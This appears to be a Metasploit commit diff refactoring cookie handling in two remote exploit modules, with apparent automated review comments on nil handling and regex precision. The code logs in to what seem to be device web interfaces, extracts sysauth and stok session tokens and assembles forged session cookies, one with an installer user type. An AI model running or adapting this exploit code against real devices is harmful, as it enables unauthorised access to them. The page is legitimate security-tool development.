Get @jhart-r7's fixes for cookie tests

MS-2855/keylogger-mettle-extension
Tod Beardsley 2017-12-19 09:03:51 -06:00
commit 2fa1568151
No known key found for this signature in database
GPG Key ID: 08B5B91DC85943FE
2 changed files with 13 additions and 12 deletions


@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote
} }
) )
cookies = res.get_cookies
good_response = ( good_response = (
res && res &&
res.code == 200 && res.code == 200 &&
res.headers.include?('Set-Cookie') && cookies.include?('sysauth')
res.headers['Set-Cookie'].include?('sysauth')
) )
if good_response if good_response
sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) sysauth_value = cookies.match(/((.*)[$ ])/)
cookie1 = "#{sysauth_value}" cookie1 = "#{sysauth_value}"
prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/) prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/)
@ -158,10 +158,11 @@ class MetasploitModule < Msf::Exploit::Remote
} }
) )
cookies = res.get_cookies
good_response = ( good_response = (
res && res &&
res.code == 200 && res.code == 200 &&
res.headers.include?('Set-Cookie') && !cookies.blank? &&
!res.body.include?('auth_failed') && !res.body.include?('auth_failed') &&
!res.body.include?('Maximum number of users reached.') !res.body.include?('Maximum number of users reached.')
) )
@ -170,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}") print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
# get the cookie now # get the cookie now
sysauth_value_2 = res.headers['Set-Cookie'].match(/((.*)[$ ])/) sysauth_value_2 = cookies.match(/((.*)[$ ])/)
stok_value_2_dirty = res.body.match(/"stok": "(.*?)"/) stok_value_2_dirty = res.body.match(/"stok": "(.*?)"/)
stok_value_2 = "#{stok_value_2_dirty}".split('"')[3] stok_value_2 = "#{stok_value_2_dirty}".split('"')[3]
final_cookie = "#{sysauth_value_2}" + 'usernameType_80=admin; stok_80=' + "#{stok_value_2}" final_cookie = "#{sysauth_value_2}" + 'usernameType_80=admin; stok_80=' + "#{stok_value_2}"
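Review bot: `cookies = res.get_cookies` is evaluated before the `res &&` guard inside `good_response`, so a nil `res` (no response to the request) now raises NoMethodError instead of falling through to the failure path; the old `res.headers...` calls sat behind that guard. The same ordering is in the second hunk of this file and at both `cookies = res.get_cookies` lines in the other file. Guard the assignment, for example `cookies = res ? res.get_cookies : ''`, or compute it only after `res` has been checked. The enclosing methods start and end outside these hunks, so an earlier nil check on `res` may exist but is not visible here.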


@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote
} }
) )
cookies = res.get_cookies
good_response = ( good_response = (
res && res &&
res.code == 200 && res.code == 200 &&
res.headers.include?('Set-Cookie') && cookies.include?('sysauth')
res.headers['Set-Cookie'].include?('sysauth')
) )
if good_response if good_response
sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) sysauth_value = cookies.match(/((.*)[$ ])/)
cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D" cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
@ -157,11 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote
} }
) )
cookies = res.get_cookies
good_response = ( good_response = (
res && res &&
res.code == 200 && res.code == 200 &&
res.headers.include?('Set-Cookie') && cookies.include?('stok=') &&
res.headers['Set-Cookie'].include?('stok=') &&
!res.body.include?('Maximum number of users reached.') !res.body.include?('Maximum number of users reached.')
) )
@ -169,9 +169,9 @@ class MetasploitModule < Msf::Exploit::Remote
print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}") print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
# get the cookie now # get the cookie now
get_stok = res.headers['Set-Cookie'].match(/stok=(.*)/) get_stok = cookies.match(/stok=(.*)/)
stok_value = get_stok[1] stok_value = get_stok[1]
sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) sysauth_value = cookies.match(/((.*)[$ ])/)
final_cookie = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}" final_cookie = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
# create config_uri # create config_uri
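Review bot: The patterns now applied to `cookies` are the ones written for the raw `Set-Cookie` header and are looser than they look: in `/stok=(.*)/` the capture is greedy, and in `/((.*)[$ ])/` the `[$ ]` is a character class (a literal `$` or a space), not an end anchor. If `get_cookies` returns several `name=value` pairs in one string (its format is not visible on this page), both captures can run past the intended cookie, and `"#{sysauth_value}"` interpolates the whole match including the trailing delimiter. Matching on the cookie name and stopping at the separator would be more precise, for example `cookies.match(/stok=([^;]*)/)` and `cookies[/sysauth=[^;]*/]`. The same `/((.*)[$ ])/` pattern is used in the first file's hunks. A short comment stating the expected shape of `cookies` would help the next reader.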